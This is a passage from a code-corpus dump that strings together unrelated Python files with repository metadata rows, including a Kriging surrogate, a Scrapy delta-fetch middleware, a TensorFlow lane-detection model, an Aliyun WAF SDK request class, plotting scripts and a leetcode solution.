:param x: Point at which the surrogate is evaluated.
"""
super(KrigingSurrogate, self).predict(x)
X, Y = self.X, self.Y
thetas = power(10., self.thetas)
r = exp(-thetas.dot(square((x - X).T)))
if self.R_fact is not None:
# Cholesky Decomposition
sol = cho_solve(self.R_fact, r).T
else:
# Linear Least Squares
sol = lstsq(self.R, r)[0].T
f = self.mu + dot(r, self.R_solve_ymu)
term1 = dot(r, sol)
# Note: sum(sol) should be 1, since Kriging is an unbiased
# estimator. This measures the effect of numerical instabilities.
bias = (1.0 - sum(sol)) ** 2. / sum(self.R_solve_one)
mse = self.sig2 * (1.0 - term1 + bias)
rmse = sqrt(abs(mse))
return f, rmse
def linearize(self, x):
"""Calculates the jacobian of the Kriging surface at the requested point.
:param x: Point at which the surrogate Jacobian is evaluated.
"""
thetas = power(10., self.thetas)
r = exp(-thetas.dot(square((x - self.X).T)))
# Z = einsum('i,ij->ij', X, Y) is equivalent to, but much faster and
# memory efficient than, diag(X).dot(Y) for vector X and 2D array Y.
# I.e. Z[i,j] = X[i]*Y[i,j]
gradr = r * -2 * einsum('i,ij->ij', thetas, (x - self.X).T)
jac = gradr.dot(self.R_solve_ymu).T
return jac
class FloatKrigingSurrogate(KrigingSurrogate):
"""Surrogate model based on the simple Kriging interpolation. Predictions are returned as floats,
which are the mean of the model's prediction.
"""
def predict(self, x):
dist = super(FloatKrigingSurrogate, self).predict(x)
return dist[0] # mean value
| [
"quanpan302@hotmail.com"
] | quanpan302@hotmail.com |
3f3958a62d181d094a638a1d21990e621e83aee4 | 16e266cf50a712ed29a4097e34504aac0281e6cb | /Functions/venv/lib/python3.6/site-packages/_TFL/IV_Number.py | 727c60959a0c90ead1b7c1e10a1327d21cb2e807 | [
"BSD-3-Clause"
] | permissive | felix-ogutu/PYTHON-PROJECTS | 9dd4fdcfff6957830587b64c5da3b5c3ade3a27e | 8c1297dbda495078509d06a46f47dc7ee60b6d4e | refs/heads/master | 2023-06-05T04:41:36.727376 | 2021-06-25T20:36:52 | 2021-06-25T20:36:52 | 380,348,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,642 | py | # -*- coding: utf-8 -*-
# Copyright (C) 1999-2015 Mag. Christian Tanzer. All rights reserved
# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at
# ****************************************************************************
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# TFL.IV_Number
#
# Purpose
# Model Interface-Version Number
#
# Revision Dates
# 25-Oct-1999 (CT) Creation
# 2-Nov-1999 (CT) Comment added
# 15-Nov-1999 (CT) `db_extension` added
# 18-Nov-1999 (CT) `producer` added
# 19-Nov-1999 (CT) `producer` convert to list
# 19-Nov-1999 (CT) `consumer` added
# 8-Aug-2000 (MG) Format of `__repr__` changed
# 9-Aug-2000 (CT) `clone` added
# 9-Aug-2000 (MG) `_unnested` added and used in `__repr__`
# 28-Sep-2000 (CT) s/database/data base/g
# 13-Dec-2000 (CT) s/data base/database/g
# 12-Apr-2002 (CT) Use `StandardError` instead of `Exception`
# 15-Apr-2002 (CT) Raise `TypeError` instead of string exception
# (__setattr__)
# 24-Oct-2002 (CT) Esthetics
# 28-Sep-2004 (CT) Use `isinstance` instead of type comparison
# 14-Feb-2006 (CT) Moved into package `TFL`
# 9-Aug-2006 (CT) `__hash__` changed to return `hash (id (self))`
# instead of `id (self)`
# ««revision-date»»···
#--
from _TFL import TFL
from _TFL.pyk import pyk
class Interface_Mismatch (Exception) :
pass
class IV_Number :
"""Model Interface-Version Number.
An `IV_Number` describes the version of a specific interface of a
software product (e.g., a database read or written).
`external_version` is set to the version of the interface when the
program reads information from that interface. The value of
`external_version` can be used to convert from an old to a new format.
`external_version` applies only to two-way interfaces which are
read and written by the same program.
`external_version` must lie in the interval (`comp_min`, `comp_max`).
If it is set to a value not in that interval, an exception is raised.
The function `compatible` can be used to check the `external_version`
before setting it.
"""
def __init__ \
( self, name, producer, consumer, program_version
, comp_min = None
, comp_max = None
, db_extension = None
) :
if isinstance (producer, pyk.string_types) :
producer = (producer, )
if isinstance (consumer, pyk.string_types) :
consumer = (consumer, )
self.name = name
self.producer = producer
self.consumer = consumer
self.program_version = program_version
self.comp_min = (comp_min, program_version) [comp_min is None]
self.comp_max = (comp_max, program_version) [comp_max is None]
self.db_extension = db_extension
self.reset_external_version ()
# end def __init__
def clone (self, comp_min) :
"""Returns a clone of `self` with changed `comp_min`."""
return self.__class__ \
( self.name
, self.producer
, self.consumer
, self.program_version
, comp_min
, self.comp_max
, self.db_extension
)
# end def clone
def compatible (self, external_version) :
return self.comp_min <= external_version <= self.comp_max
# end def compatible
def restrict (self, comp_min, comp_max) :
"""Restrict compatibility interval to `comp_min` and `comp_max`."""
self.__dict__ ["comp_min"] = max (self.comp_min, comp_min)
self.__dict__ ["comp_max"] = min (self.comp_max, comp_max)
# end def restrict
def reset_external_version (self) :
"""Reset `self.external_version`."""
self.__dict__ ["external_version"] = -1
# end def reset_external_version
def __setattr__ (self, name, value) :
"""Prevent the changing of attributes other than `external_version`.
`external_version` is checked for compatibility with `comp_min`
and `comp_max`.
Once an attribute is set, it cannot be changed to another value.
"""
if hasattr (self, name) and name != "external_version" :
raise TypeError \
( "Attribute %s is readonly. Cannot change value from %s to %s"
% (name, getattr (self, name), value)
)
self.__dict__ [name] = value
if name == "external_version" :
if not self.compatible (value) :
raise Interface_Mismatch (self)
# end def __setattr__
def __str__ (self) :
return "%s = %s" % (self.name, self.program_version)
# end def __str__
def _unnested (self, l) :
if len (l) == 1 :
return l [0]
else :
return l
# end def _unnested
def __repr__ (self) :
return "%s ('%s', %s, %s, %s, %s, %s, '%s')" % \
( self.__class__.__name__, self.name
, repr (self._unnested (self.producer))
, repr (self._unnested (self.consumer))
, self.program_version, self.comp_min, self.comp_max
, self.db_extension or ""
)
# end def __repr__
# end class IV_Number
if __name__ != "__main__" :
TFL._Export ("*")
### __END__ TFL.IV_Number
| [
"you@example.com"
] | you@example.com |
93138bc3c1cbcdd2bc2cd63d9d87a7507f988c15 | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-5/4ef793f2658bd7c8752e604548e55c2bcdd82d7b-<test_constructor_from_items>-fix.py | 338f47c225316ff2ab0d0bf23e89689e8cc87cbd | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,948 | py | def test_constructor_from_items(self, float_frame, float_string_frame):
items = [(c, float_frame[c]) for c in float_frame.columns]
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
recons = DataFrame.from_items(items)
tm.assert_frame_equal(recons, float_frame)
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
recons = DataFrame.from_items(items, columns=['C', 'B', 'A'])
tm.assert_frame_equal(recons, float_frame.loc[:, ['C', 'B', 'A']])
row_items = [(idx, float_string_frame.xs(idx)) for idx in float_string_frame.index]
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
recons = DataFrame.from_items(row_items, columns=float_string_frame.columns, orient='index')
tm.assert_frame_equal(recons, float_string_frame)
assert (recons['A'].dtype == np.float64)
msg = "Must pass columns with orient='index'"
with pytest.raises(TypeError, match=msg):
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
DataFrame.from_items(row_items, orient='index')
arr = construct_1d_object_array_from_listlike(([('bar', 'baz')] * len(float_string_frame)))
float_string_frame['foo'] = arr
row_items = [(idx, list(float_string_frame.xs(idx))) for idx in float_string_frame.index]
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
recons = DataFrame.from_items(row_items, columns=float_string_frame.columns, orient='index')
tm.assert_frame_equal(recons, float_string_frame)
assert isinstance(recons['foo'][0], tuple)
with tm.assert_produces_warning(FutureWarning, check_stacklevel=False):
rs = DataFrame.from_items([('A', [1, 2, 3]), ('B', [4, 5, 6])], orient='index', columns=['one', 'two', 'three'])
xp = DataFrame([[1, 2, 3], [4, 5, 6]], index=['A', 'B'], columns=['one', 'two', 'three'])
tm.assert_frame_equal(rs, xp) | [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
19ed14adeb53df54f976ec502b271381df4d55ff | 7dd7b9a1dfd9d8c6ea08e1386737ba9a5c1b4163 | /ordasambond/ordasambond/middlewares/deltafetch.py | c7e77a34393e69669ecde39cdbfdf352956b8cfd | [] | no_license | gogn-in/ordasambond | f07c402c9af0915841e8dfb4bb6b9250e90480cb | ca5f2895a36156a1e9b8f9f28fe6c8f3f9f8b435 | refs/heads/master | 2021-01-10T10:50:48.072071 | 2016-03-22T22:58:22 | 2016-03-22T22:58:22 | 54,489,216 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,149 | py | import os
import time
from scrapy.http import Request
from scrapy.item import BaseItem
from scrapy.utils.request import request_fingerprint
from scrapy.utils.project import data_path
from scrapy.exceptions import NotConfigured
from scrapy import signals
import logging
logger = logging.getLogger(__name__)
# Custom version of the DeltaFetch middleware from scrapylib:
# https://github.com/scrapinghub/scrapylib
# Custom in the fact that the latest version of scrapy has deprecated
# scrapy.log. This version uses python logging.
class DeltaFetch(object):
"""This is a spider middleware to ignore requests to pages containing items
seen in previous crawls of the same spider, thus producing a "delta crawl"
containing only new items.
This also speeds up the crawl, by reducing the number of requests that need
to be crawled, and processed (typically, item requests are the most cpu
intensive).
Supported settings:
* DELTAFETCH_ENABLED - to enable (or disable) this extension
* DELTAFETCH_DIR - directory where to store state
* DELTAFETCH_RESET - reset the state, clearing out all seen requests
Supported spider arguments:
* deltafetch_reset - same effect as DELTAFETCH_RESET setting
Supported request meta keys:
* deltafetch_key - used to define the lookup key for that request. by
default it's the fingerprint, but it can be changed to contain an item
id, for example. This requires support from the spider, but makes the
extension more efficient for sites that many URLs for the same item.
"""
def __init__(self, dir, reset=False):
dbmodule = None
try:
dbmodule = __import__('bsddb3').db
except ImportError:
try:
dbmodule = __import__('bsddb').db
except ImportError:
pass
if not dbmodule:
raise NotConfigured('bssdb or bsddb3 is required')
self.dbmodule = dbmodule
self.dir = dir
self.reset = reset
self.logger = logging.getLogger(__name__)
@classmethod
def from_crawler(cls, crawler):
s = crawler.settings
if not s.getbool('DELTAFETCH_ENABLED'):
raise NotConfigured
dir = data_path(s.get('DELTAFETCH_DIR', 'deltafetch'))
reset = s.getbool('DELTAFETCH_RESET')
o = cls(dir, reset)
crawler.signals.connect(o.spider_opened, signal=signals.spider_opened)
crawler.signals.connect(o.spider_closed, signal=signals.spider_closed)
return o
def spider_opened(self, spider):
if not os.path.exists(self.dir):
os.makedirs(self.dir)
dbpath = os.path.join(self.dir, '%s.db' % spider.name)
reset = self.reset or getattr(spider, 'deltafetch_reset', False)
flag = self.dbmodule.DB_TRUNCATE if reset else self.dbmodule.DB_CREATE
try:
self.db = self.dbmodule.DB()
self.db.open(filename=dbpath,
dbtype=self.dbmodule.DB_HASH,
flags=flag)
except Exception:
logger.critical("Failed to open DeltaFetch database at %s, "
"trying to recreate it" % dbpath)
if os.path.exists(dbpath):
os.remove(dbpath)
self.db = self.dbmodule.DB()
self.db.open(filename=dbpath,
dbtype=self.dbmodule.DB_HASH,
flags=self.dbmodule.DB_CREATE)
def spider_closed(self, spider):
self.db.close()
def process_spider_output(self, response, result, spider):
for r in result:
if isinstance(r, Request):
key = self._get_key(r)
if self.db.has_key(key):
self.logger.info("Ignoring already visited: %s" % r)
continue
elif isinstance(r, BaseItem):
key = self._get_key(response.request)
self.db[key] = str(time.time())
yield r
def _get_key(self, request):
return request.meta.get('deltafetch_key') or request_fingerprint(request)
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
b10177e34d37112453bda54ad58806a828ae33b8 | b0807e3ad7af88ffd3152c7fc5315604f553f8fc | /perceptron/perceptron.py | 7ab3b594c5df700d4fc76047f5a6939c77a4813e | [] | no_license | jhamrick/sigcse-2016-slides | f34bfbb93b851efca574a0a2da0d4182c64b979a | 44d3fab1c6dea14c00272a7ad7b43703fff7d4d2 | refs/heads/master | 2021-01-10T09:04:20.777687 | 2016-03-04T15:10:58 | 2016-03-04T15:10:58 | 53,106,715 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,586 | py | import numpy as np
import matplotlib.pyplot as plt
def gen_data(m):
"""Generate m random data points from each of two diferent normal
distributions with unit variance, for a total of 2*m points.
Parameters
----------
m : int
Number of points per class
Returns
-------
x, y : numpy arrays
x is a float array with shape (m, 2)
y is a binary array with shape (m,)
"""
sigma = np.eye(2)
mu = np.array([[0, 2], [0, 0]])
mvrandn = np.random.multivariate_normal
x = np.concatenate([mvrandn(mu[:, 0], sigma, m), mvrandn(mu[:, 1], sigma, m)], axis=0)
y = np.concatenate([np.zeros(m), np.ones(m)], axis=0)
idx = np.arange(2 * m)
np.random.shuffle(idx)
x = x[idx]
y = y[idx]
return x, y
def set_limits(axis, x):
"""Set the axis limits, based on the min and max of the points.
Parameters
----------
axis : matplotlib axis object
x : array with shape (m, 2)
"""
axis.set_xlim(x[:, 0].min() - 0.5, x[:, 0].max() + 0.5)
axis.set_ylim(x[:, 1].min() - 0.5, x[:, 1].max() + 0.5)
def init_plot(x, y, boundary, loops):
"""Initialize the plot with two subplots: one for the training
error, and one for the decision boundary. Returns a function
that can be called with new errors and boundary to update the
plot.
Parameters
----------
x : numpy array with shape (m, 2)
The input data points
y : numpy array with shape (m,)
The true labels of the data
boundary : numpy array with shape (2, 2)
Essentially, [[xmin, ymin], [xmax, ymax]]
Returns
-------
update_plot : function
This function takes two arguments, the array of errors and
the boundary, and updates the error plot with the new errors
and the boundary on the data plot.
"""
plt.close('all')
fig, (ax1, ax2) = plt.subplots(1, 2)
error_line, = ax1.plot([0], [0], 'k-')
ax1.set_xlim(0, (loops * y.size) - 1)
ax1.set_ylim(0, 15)
ax1.set_xlabel("Iteration")
ax1.set_ylabel("Training error")
colors = np.empty((y.size, 3))
colors[y == 0] = [0, 0, 1]
colors[y == 1] = [1, 0, 0]
ax2.scatter(x[:, 0], x[:, 1], c=colors, s=25)
normal_line, = ax2.plot(boundary[0, 0], boundary[0, 1], 'k-', linewidth=1.5)
set_limits(ax2, x)
plt.draw()
plt.show()
def update_plot(errors, boundary):
error_line.set_xdata(np.arange(errors.size))
error_line.set_ydata(errors)
normal_line.set_xdata(boundary[:, 0])
normal_line.set_ydata(boundary[:, 1])
set_limits(ax2, x)
fig.canvas.draw()
return update_plot
def calc_normal(normal, weights):
"""Calculate the normal vector and decision boundary.
Parameters
----------
normal : numpy array with shape (2,)
The normal vector to the decision boundary
weights : numpy array with shape (3,)
Weights of the perceptron
Returns
-------
new_normal, boundary : numpy arrays
The new_normal array is the updated normal vector. The
boundary array is [[xmin, ymin], [xmax, ymax]] of the
boundary between the points.
"""
new_normal = normal - (np.dot(weights[:2], normal) / np.dot(weights[:2], weights[:2])) * weights[:2]
new_normal = new_normal / np.dot(new_normal, new_normal)
offset = -weights[2] * weights[:2] / np.dot(weights[:2], weights[:2])
normmult = np.array([-1000, 1000])
boundary = (new_normal[None] * normmult[:, None]) + offset[None]
return new_normal, boundary
| [
"jhamrick@berkeley.edu"
] | jhamrick@berkeley.edu |
dff5734cf3ac7ce60a11c12aaff326812956ba5c | afd11dfdfb07880d0dfe9593662753741627f39d | /lane_detection_cnn.py | e0fba6f2252c1221e1b09386661af826b2762d30 | [] | no_license | nghiatdprt/Lane-Detection-Basic | a12aeabae838c54912e67d95cf20fddecef6374d | c1449bf1d3539658f851fd996b2df74c0fdcbd5c | refs/heads/master | 2020-03-28T16:10:51.485929 | 2018-09-13T16:42:42 | 2018-09-13T16:42:42 | 148,667,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,101 | py | import tensorflow as tf
import numpy as np
import logging
import toulouse_dataset
import cv2
model_params = {
'input_shape': (320, 50, 3),
'batch_size': 100
}
hyper_params = {
'learning_rate': 0.01,
'drop_out': 0.25
}
tf.logging.set_verbosity(tf.logging.INFO)
def conv2d_fn(input_tensor, k_size, n_out):
return tf.layers.conv2d(inputs= input_tensor, \
filters= n_out, \
kernel_size= k_size, \
activation= tf.nn.relu, \
use_bias= True)
def maxpool2d_fn(input_tensor, p_size, strides):
return tf.layers.max_pooling2d(inputs= input_tensor, pool_size= p_size, strides= strides)
def model_fn(features, labels, mode):
features_tensor = tf.cast(features, tf.float32, name="input_tensor")
net = conv2d_fn(features_tensor, 3, 32)
net = maxpool2d_fn(net, 2, 2)
net = conv2d_fn(features_tensor, 3, 64)
net = maxpool2d_fn(net, 2, 2)
net = tf.layers.flatten(net)
# net = tf.layers.dense(inputs= features_tensor, units= 512, activation=tf.nn.relu)
# net = tf.layers.dense(inputs= net, units= 256)
out_put = tf.layers.dense(inputs= net, units= 2, name="out_put")
prediction = {
'coordinate' : tf.cast(out_put, tf.int32)
}
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.estimator.EstimatorSpec(mode = mode, predictions = prediction)
labels = tf.cast(labels, tf.int32)
loss = tf.losses.mean_squared_error(labels= labels, predictions= out_put)
tf.summary.scalar('loss', loss)
if mode == tf.estimator.ModeKeys.TRAIN:
optimizer = tf.train.AdamOptimizer(learning_rate= hyper_params['learning_rate'])
train_op = optimizer.minimize(loss = loss, global_step= tf.train.get_global_step())
return tf.estimator.EstimatorSpec(mode = mode, loss = loss, train_op = train_op)
rmse = tf.metrics.root_mean_squared_error(labels, prediction['coordinate'])
# Add the rmse to the collection of evaluation metrics.
eval_metrics = {"rmse": rmse}
return tf.estimator.EstimatorSpec(
mode=mode,
# Report sum of error for compatibility with pre-made estimators
loss=loss,
eval_metric_ops=eval_metrics)
def preprocess_data(img_list, width= 320, height=50):
# image = cv2.resize(image, (width, height), interpolation=cv2.INTER_LINEAR)
res = img_list
# create a big 1D-array
# for img in img_list:
# # img = cv2.resize(img, (width, height), interpolation=cv2.INTER_LINEAR)
# # img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# # mask_white = cv2.inRange(img, 140, 255)
# res.append(cv2.resize(img, (int(width/2), int(height/2))))
# res = np.array(res)
# data_shape = res.shape
# res = np.reshape(res, [data_shape[0], data_shape[1], data_shape[2], -1])
# print(res.shape)
# Normalize
res = res / 255. # values in [0, 1]
res -= 0.5 # values in [-0.5, 0.5]
res *= 2 # values in [-1, 1]
return res
# x_train, y_train, x_test, y_test = toulouse_dataset.load_toulouse_dataset()
# x_train = preprocess_data(x_train)
# x_test = preprocess_data(x_test)
model_classifier = tf.estimator.Estimator(
model_fn = model_fn, \
model_dir= 'CheckPoint2')
# print(model_classifier)
# train_input_fn = tf.estimator.inputs.numpy_input_fn(
# x = x_train,
# y = y_train,
# num_epochs= None,
# batch_size= model_params['batch_size'],
# shuffle= True)
# model_classifier.train(
# input_fn = train_input_fn,\
# steps= 2000)
# eval_input_fn = tf.estimator.inputs.numpy_input_fn(
# x = x_train,
# y = y_train,
# num_epochs= 1,
# shuffle= False)
# eval_result = model_classifier.evaluate(input_fn = eval_input_fn)
# print(eval_result)
def serving_input_receiver_fn():
inputs = tf.placeholder(dtype = tf.float32, shape=[None, 50, 320, 3])
return tf.estimator.export.TensorServingInputReceiver(inputs, inputs)
model_classifier.export_savedmodel(export_dir_base="model", serving_input_receiver_fn= serving_input_receiver_fn)
| [
"nghiatd.proptit@gmail.com"
] | nghiatd.proptit@gmail.com |
6605c15fbea3b939cbdb337a3ca2ab161f3d6946 | d786da05888e4154456e14caa52b10ea5075c65d | /aliyun-python-sdk-waf-openapi/aliyunsdkwaf_openapi/request/v20190910/DescribeProtectBlockSummaryRequest.py | 03b19268e6418f6bfd57ce08fb13c3f1390f40c0 | [
"Apache-2.0"
] | permissive | yuerl/aliyun-openapi-python-sdk | c95d35712d21d42c5f9eec1d255375d3d11bd63b | 205ab3f0ed32c61c382d7383659e42f3e5300e7b | refs/heads/master | 2022-07-03T02:27:44.550641 | 2020-05-12T03:27:46 | 2020-05-12T03:27:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,561 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkwaf_openapi.endpoint import endpoint_data
class DescribeProtectBlockSummaryRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'waf-openapi', '2019-09-10', 'DescribeProtectBlockSummary','waf')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_StartTimestamp(self):
return self.get_query_params().get('StartTimestamp')
def set_StartTimestamp(self,StartTimestamp):
self.add_query_param('StartTimestamp',StartTimestamp)
def get_EndTimestamp(self):
return self.get_query_params().get('EndTimestamp')
def set_EndTimestamp(self,EndTimestamp):
self.add_query_param('EndTimestamp',EndTimestamp)
def get_SourceIp(self):
return self.get_query_params().get('SourceIp')
def set_SourceIp(self,SourceIp):
self.add_query_param('SourceIp',SourceIp)
def get_Lang(self):
return self.get_query_params().get('Lang')
def set_Lang(self,Lang):
self.add_query_param('Lang',Lang)
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_Domain(self):
return self.get_query_params().get('Domain')
def set_Domain(self,Domain):
self.add_query_param('Domain',Domain)
def get_Step(self):
return self.get_query_params().get('Step')
def set_Step(self,Step):
self.add_query_param('Step',Step)
def get_Region(self):
return self.get_query_params().get('Region')
def set_Region(self,Region):
self.add_query_param('Region',Region) | [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
d4f548f887979fe662fa1a6fae964c21b6ec91cc | 7773ea6f465ffecfd4f9821aad56ee1eab90d97a | /python/helpers/typeshed/stdlib/3/faulthandler.pyi | afd739462fc964f6a9a603b810193f2fd07831dd | [
"Apache-2.0",
"MIT"
] | permissive | aghasyedbilal/intellij-community | 5fa14a8bb62a037c0d2764fb172e8109a3db471f | fa602b2874ea4eb59442f9937b952dcb55910b6e | refs/heads/master | 2023-04-10T20:55:27.988445 | 2020-05-03T22:00:26 | 2020-05-03T22:26:23 | 261,074,802 | 2 | 0 | Apache-2.0 | 2020-05-04T03:48:36 | 2020-05-04T03:48:35 | null | UTF-8 | Python | false | false | 685 | pyi | import io
import sys
from typing import Union, Protocol
from _types import FileDescriptorLike
def cancel_dump_traceback_later() -> None: ...
def disable() -> None: ...
def dump_traceback(file: FileDescriptorLike = ..., all_threads: bool = ...) -> None: ...
def dump_traceback_later(timeout: float, repeat: bool = ..., file: FileDescriptorLike = ..., exit: bool = ...) -> None: ...
def enable(file: FileDescriptorLike = ..., all_threads: bool = ...) -> None: ...
def is_enabled() -> bool: ...
if sys.platform != "win32":
def register(signum: int, file: FileDescriptorLike = ..., all_threads: bool = ..., chain: bool = ...) -> None: ...
def unregister(signum: int) -> None: ...
| [
"intellij-monorepo-bot-no-reply@jetbrains.com"
] | intellij-monorepo-bot-no-reply@jetbrains.com |
bb6938b5b08f304d80dd221b6c19dcf8965a7305 | 2b54b1fb1540ab73d6c83cae3acd5fdd58bdead5 | /Vanadium_cluster_project/anatase_TiO2_101surface_used/V2O5_TiO2_101_zorderimageplot_3by1supercell.py | 971ec963ae899a6b55cf92ebb34b23675e957e46 | [] | no_license | sivachiriki/GOFEE_Pt_V_supported | 5787d44294262870075f35f2d31c096021b7ce20 | 6bd700dac1f3e7c58394b758d75246ac6e07eade | refs/heads/master | 2022-04-08T11:38:13.038455 | 2020-03-09T10:48:31 | 2020-03-09T10:48:31 | 226,359,812 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,932 | py | from __future__ import division
import matplotlib
#matplotlib.use('Agg') # Can also use 'tkagg' or 'webagg'
#from plot_neb_tio2 import *
from matplotlib.offsetbox import TextArea, VPacker, AnnotationBbox
import matplotlib.patches as patches
import matplotlib.pyplot as plt
from ase.io import read, write
from ase.visualize import view
import matplotlib.patches as mpatches
from ase.data.colors import jmol_colors
from pylab import *
from ase.data import covalent_radii as aradii
from matplotlib.patches import Circle
from math import atan2,pi
import matplotlib.gridspec as gridspec
matplotlib.rcParams['xtick.direction'] = 'out'
matplotlib.rcParams['ytick.direction'] = 'out'
matplotlib.rc('font',**{'family':'sans-serif',
'sans-serif':['Helvetica'],
'size':14})
matplotlib.rc('text',usetex=True)
matplotlib.rcParams['text.latex.unicode']=True
#matplotlib.rcParams['text.latex.preamble']=['\usepackage{bm}']
#matplotlib.rcParams['text.latex.preamble']=['\usepackage{xfrac}']
matplotlib.rcParams['mathtext.default'] = 'regular'
matplotlib.rcParams['ps.usedistiller'] = 'xpdf'
matplotlib.rc('xtick', labelsize=14)
matplotlib.rc('ytick', labelsize=14)
def plot_atoms(ax, atoms, xyz, acols, alp, z):
ecols = [[0, 0, 0] for col in atoms]
indices = range(len(atoms))
for ia in indices:
acol = acols[ia]
ecol = ecols[ia]
if atoms[ia].symbol == 'Ti':
arad = aradii[atoms[ia].number] #* 0.9 * 0.5
else:
arad = aradii[atoms[ia].number] #* 0.9
apos = atoms[ia].position
eps = arad
circ = Circle([apos[xyz[0]], apos[xyz[1]]],
fc = acol,
ec = ecol,
radius = arad,
lw = 0.5,
alpha = alp[ia],
zorder = 1 - apos[1]/1000
)
ax.add_patch(circ)
def plot_conf(ax, atoms, rot=False):
colors = np.array([jmol_colors[atom.number] for atom in atoms])
for i, atom in enumerate(atoms):
if (atom.number ==23):
colors[i] =[76/255, 153/255, 0/255]
if (atom.number ==8 and i >= 648):
colors[i] =[153/255, 0/255, 0/255]
if (atom.number ==1):
colors[i] =[255/255, 255/255, 255/255]
alp = [None] * colors.shape[0]
for i,a in enumerate(atoms):
if a.symbol == 'Ti' or a.symbol == 'O':
if a.position[2] < 13.50:
alp[i] = 0.6
if rot:
atoms.rotate('x',pi/2)
plot_atoms(ax, atoms, [0,2,1], colors, alp, z=-1)
data=read('anataseTi24O48_101surface_optPBEesben_1by3.traj@:')
for j in range(len(data)):
image = data[j]
#for i,a in enumerate(image):
# if a.position[1] >15.180:
# image.positions[i,1] =0.000
#image = image * (2,2,1)
# Make array of indices for atoms that should be repeated in x and y directions
plt.figure(figsize=(4.0,6.0))
gs = gridspec.GridSpec(2, 1,
height_ratios=[6.32,7.18])
cell = image.get_cell()
# 0 0
ax = plt.subplot(gs[0, 0])
img = image.copy()
plot_conf(ax, img)
print(cell[0,0])
print(cell[1,1])
ax.set_xlim([-1.0, 10.70])
ax.set_ylim([5.50, 16.50])
ax.set_yticks([])
ax.set_xticks([])
ax.set(aspect=1)
# 0 1
ax = plt.subplot(gs[1, 0])
img = image.copy()
plot_conf(ax, img, rot=True)
ax.set_xlim([-1.0, 10.7])
ax.set_ylim([-1.50, 11.0])
ax.set_yticks([])
ax.set_xticks([])
ax.set(aspect=1)
gs.update(wspace=0.00,hspace=0.00)
plt.tight_layout()
name ='TiO2_101sur_3by1supercell.png'
savefig(name,bbox_inches='tight')
plt.show()
| [
"sivachiriki@phys.au.dk"
] | sivachiriki@phys.au.dk |
b7518824fc43b6c989902289a1fef325022b1247 | 1bde114a847c629701e3acd004be5788594e0ef1 | /Examples/Py4Prog/different_returns.py | 1a92b3a3f7f74d4fb0490267fad9e52e0ae4e56b | [] | no_license | BruceEckel/ThinkingInPython | 0b234cad088ee144bb8511e1e7db9fd5bba78877 | 76a1310deaa51e02e9f83ab74520b8269aac6fff | refs/heads/master | 2022-02-21T23:01:40.544505 | 2022-02-08T22:26:52 | 2022-02-08T22:26:52 | 97,673,620 | 106 | 33 | null | 2022-02-08T22:26:53 | 2017-07-19T04:43:50 | Python | UTF-8 | Python | false | false | 200 | py | # Py4Prog/different_returns.py
def different_returns(arg):
if arg == 1:
return "one"
if arg == "one":
return True
print(different_returns(1))
print(different_returns("one"))
| [
"mindviewinc@gmail.com"
] | mindviewinc@gmail.com |
959d294c8eca3319541da2fd16288d2149cf7a73 | 61c6f707403307bbf124f85689d0008c5fef7462 | /removeElements.py | 949269ae5a03d3f3af57c0ab3e5c55db9ef21a01 | [] | no_license | immzz/leetcode_solutions | 1685bb82abccbcb7e8869e6df61d79241d66d17b | baddc09a5e626d919011aa222667a40e2ef4c375 | refs/heads/master | 2016-09-06T06:44:56.971046 | 2015-10-06T01:35:39 | 2015-10-06T01:35:39 | 23,483,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 933 | py | class Solution:
# @param {integer[]} nums
# @param {integer} val
# @return {integer}
def removeElement(self, nums, val):
if (not nums) or len(nums) < 1:
return 0
length = len(nums)
val_ptr = 0
current_ptr = 0
while (val_ptr < len(nums)) and (current_ptr < len(nums)):
while (val_ptr < len(nums)) and (not (nums[val_ptr] == val)):
val_ptr += 1
current_ptr = val_ptr + 1
while (current_ptr < len(nums)) and (nums[current_ptr] == val):
current_ptr += 1
if (current_ptr < len(nums)) and (val_ptr < len(nums)):
temp = nums[current_ptr]
nums[current_ptr] = nums[val_ptr]
nums[val_ptr] = temp
